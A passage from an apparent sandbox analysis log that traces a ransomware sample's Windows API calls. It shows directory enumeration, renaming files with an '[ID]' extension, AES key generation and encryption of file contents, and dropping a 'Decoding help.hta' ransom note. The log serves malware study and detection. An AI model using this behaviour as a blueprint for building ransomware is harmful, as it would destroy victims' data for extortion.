pdwDataLen=0xd08fce4*=0x8b840) returned 1 [0044.877] UnmapViewOfFile (lpBaseAddress=0x4910000) returned 1 [0044.884] CloseHandle (hObject=0x3a8) returned 1 [0044.884] CryptDestroyKey (hKey=0x5d8510) returned 1 [0044.884] CryptReleaseContext (hProv=0x3449028, dwFlags=0x0) returned 1 [0044.884] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.884] WriteFile (in: hFile=0x3a4, lpBuffer=0xd08fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xd08fcf8, lpOverlapped=0x0 | out: lpBuffer=0xd08fbe4*, lpNumberOfBytesWritten=0xd08fcf8*=0x100, lpOverlapped=0x0) returned 1 [0044.885] WriteFile (in: hFile=0x3a4, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xd08fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xd08fcf8*=0x500, lpOverlapped=0x0) returned 1 [0044.885] CloseHandle (hObject=0x3a4) returned 1 [0044.892] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceca35.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0044.892] FindNextFileW (in: hFindFile=0x5d7f90, lpFindFileData=0xd08fd30 | out: lpFindFileData=0xd08fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x1d040, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlcecompact35.dll", cAlternateFileName="SQLCEC~2.DLL")) returned 1 [0044.892] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*" [0044.892] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*") returned 66 [0044.892] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Decoding help.hta" [0044.892] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\decoding help.hta")) returned 0x1 [0044.892] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sqlcecompact35.dll") returned -1 [0044.892] lstrlenW (lpString="sqlcecompact35.dll") returned 18 [0044.892] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*" [0044.892] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*") returned 66 [0044.892] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpString2="sqlcecompact35.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlcecompact35.dll") returned="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlcecompact35.dll" [0044.892] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlcecompact35.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlcecompact35.dll") returned="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlcecompact35.dll" [0044.892] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlcecompact35.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlcecompact35.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlcecompact35.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.892] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlcecompact35.dll" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\sqlcecompact35.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlcecompact35.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\sqlcecompact35.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0051.172] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlcecompact35.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\sqlcecompact35.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0051.172] CreateFileMappingA (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3e8 [0051.172] CryptAcquireContextA (in: phProv=0xd08fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xd08fcec*=0x344a128) returned 1 [0054.726] CryptGenKey (in: hProv=0x344a128, Algid=0x6610, dwFlags=0x1, phKey=0xd08fce8 | out: phKey=0xd08fce8*=0x5a5d30) returned 1 [0054.726] CryptExportKey (in: hKey=0x5a5d30, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xd08fbe4, pdwDataLen=0xd08fce4 | out: pbData=0xd08fbe4*, pdwDataLen=0xd08fce4*=0x2c) returned 1 [0054.726] MapViewOfFile (hFileMappingObject=0x3e8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1d040) returned 0x550000 [0054.736] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xd08fbe4*, pdwDataLen=0xd08fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xd08fbe4*, pdwDataLen=0xd08fcf8*=0x100) returned 1 [0054.736] CryptEncrypt (in: hKey=0x5a5d30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x550000, pdwDataLen=0xd08fce4*=0x1d040, dwBufLen=0x1d040 | out: pbData=0x550000*, pdwDataLen=0xd08fce4*=0x1d040) returned 1 [0054.769] UnmapViewOfFile (lpBaseAddress=0x550000) returned 1 [0054.772] CloseHandle (hObject=0x3e8) returned 1 [0054.772] CryptDestroyKey (hKey=0x5a5d30) returned 1 [0054.772] CryptReleaseContext (hProv=0x344a128, dwFlags=0x0) returned 1 [0054.772] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0054.772] WriteFile (in: hFile=0x2ac, lpBuffer=0xd08fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xd08fcf8, lpOverlapped=0x0 | out: lpBuffer=0xd08fbe4*, lpNumberOfBytesWritten=0xd08fcf8*=0x100, lpOverlapped=0x0) returned 1 [0056.936] WriteFile (in: hFile=0x2ac, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xd08fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xd08fcf8*=0x500, lpOverlapped=0x0) returned 1 [0056.936] CloseHandle (hObject=0x2ac) returned 1 [0056.936] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlcecompact35.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.470] FindNextFileW (in: hFindFile=0x5d7f90, lpFindFileData=0xd08fd30 | out: lpFindFileData=0xd08fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5ab6f770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x24440, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceer35EN.dll", cAlternateFileName="SQLCEE~1.DLL")) returned 1 [0058.470] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*" [0058.470] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*") returned 66 [0058.470] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Decoding help.hta" [0058.471] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\decoding help.hta")) returned 0x1 [0058.471] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sqlceer35EN.dll") returned -1 [0058.471] lstrlenW (lpString="sqlceer35EN.dll") returned 15 [0058.471] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*" [0058.471] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*") returned 66 [0058.471] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpString2="sqlceer35EN.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceer35EN.dll") returned="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceer35EN.dll" [0058.471] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceer35EN.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceer35EN.dll") returned="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceer35EN.dll" [0058.471] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceer35EN.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceer35EN.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceer35EN.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.471] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceer35EN.dll" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\sqlceer35en.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceer35EN.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\sqlceer35en.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.614] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceer35EN.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\sqlceer35en.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe04 [0061.614] CreateFileMappingA (hFile=0xe04, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xe08 [0061.614] CryptAcquireContextA (phProv=0xd08fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 159 os_tid = 0x5c4 [0040.278] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*", lpFindFileData=0x56cfd30 | out: lpFindFileData=0x56cfd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 160 os_tid = 0x35c [0040.279] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\*.*", lpFindFileData=0xd1cfd30 | out: lpFindFileData=0xd1cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf59f9270, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d88d0 [0042.038] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.038] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0xd1cfd30 | out: lpFindFileData=0xd1cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf59f9270, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.038] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.038] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.039] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0xd1cfd30 | out: lpFindFileData=0xd1cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf59f9270, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xaf577d00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaf577d00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0042.039] lstrcmpW (lpString1=".", lpString2="1033") returned -1 [0042.039] lstrcmpW (lpString1="..", lpString2="1033") returned -1 [0042.039] lstrcmpiW (lpString1="windows", lpString2="1033") returned 1 [0042.039] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\*.*" [0042.039] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\*.*") returned 51 [0042.039] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\", lpString2="1033" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033" [0042.039] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\*.*" [0042.039] GlobalMemoryStatus (in: lpBuffer=0xd1cfd10 | out: lpBuffer=0xd1cfd10) [0042.039] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x109e8a70, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x504 [0042.040] CloseHandle (hObject=0x504) returned 1 [0042.040] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0xd1cfd30 | out: lpFindFileData=0xd1cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x696f1810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x696f1810, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Presentation Designs", cAlternateFileName="PRESEN~1")) returned 1 [0042.040] lstrcmpW (lpString1=".", lpString2="Presentation Designs") returned -1 [0042.040] lstrcmpW (lpString1="..", lpString2="Presentation Designs") returned -1 [0042.040] lstrcmpiW (lpString1="windows", lpString2="Presentation Designs") returned 1 [0042.040] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\*.*" [0042.040] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\*.*") returned 51 [0042.040] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\", lpString2="Presentation Designs" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs" [0042.040] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs\\*.*" [0042.040] GlobalMemoryStatus (in: lpBuffer=0xd1cfd10 | out: lpBuffer=0xd1cfd10) [0042.040] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5d68730, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x504 [0042.041] CloseHandle (hObject=0x504) returned 1 [0042.041] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0xd1cfd30 | out: lpFindFileData=0xd1cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x696f1810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x696f1810, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Presentation Designs", cAlternateFileName="PRESEN~1")) returned 0 [0042.041] FindClose (in: hFindFile=0x5d88d0 | out: hFindFile=0x5d88d0) returned 1 Thread: id = 161 os_tid = 0x6f8 [0040.279] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*", lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x174c0690, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x174c0690, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a58f0 [0040.280] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.280] FindNextFileW (in: hFindFile=0x5a58f0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x174c0690, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x174c0690, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.280] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.280] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.280] FindNextFileW (in: hFindFile=0x5a58f0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3830360, ftCreationTime.dwHighDateTime=0x1d4ca25, ftLastAccessTime.dwLowDateTime=0xb7c0aa0, ftLastAccessTime.dwHighDateTime=0x1d4ccc1, ftLastWriteTime.dwLowDateTime=0xb7c0aa0, ftLastWriteTime.dwHighDateTime=0x1d4ccc1, nFileSizeHigh=0x0, nFileSizeLow=0x1673a, dwReserved0=0x0, dwReserved1=0x0, cFileName="0kzI-M-c1vXcd0Bacx.mp3", cAlternateFileName="0KZI-M~1.MP3")) returned 1 [0040.280] lstrcpyW (in: lpString1=0x4238660, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0040.280] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0040.280] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" [0040.280] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\decoding help.hta")) returned 0xffffffff [0040.280] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0040.767] WriteFile (in: hFile=0x31c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x51cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.768] CloseHandle (hObject=0x31c) returned 1 [0040.768] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.158] lstrcmpiW (lpString1="Decoding help.hta", lpString2="0kzI-M-c1vXcd0Bacx.mp3") returned 1 [0041.158] lstrlenW (lpString="0kzI-M-c1vXcd0Bacx.mp3") returned 22 [0041.158] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0041.158] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0041.158] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="0kzI-M-c1vXcd0Bacx.mp3" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0kzI-M-c1vXcd0Bacx.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0kzI-M-c1vXcd0Bacx.mp3" [0041.158] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0kzI-M-c1vXcd0Bacx.mp3" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0kzI-M-c1vXcd0Bacx.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0kzI-M-c1vXcd0Bacx.mp3" [0041.158] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0kzI-M-c1vXcd0Bacx.mp3", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0kzI-M-c1vXcd0Bacx.mp3.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0kzI-M-c1vXcd0Bacx.mp3.[ID]g9uZrLhJaygpwRm1[ID]" [0041.158] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0kzI-M-c1vXcd0Bacx.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0kzi-m-c1vxcd0bacx.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0kzI-M-c1vXcd0Bacx.mp3.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0kzi-m-c1vxcd0bacx.mp3.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.159] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0kzI-M-c1vXcd0Bacx.mp3.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0kzi-m-c1vxcd0bacx.mp3.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0041.159] CreateFileMappingA (hFile=0x388, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x398 [0041.159] CryptAcquireContextA (in: phProv=0x51cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: 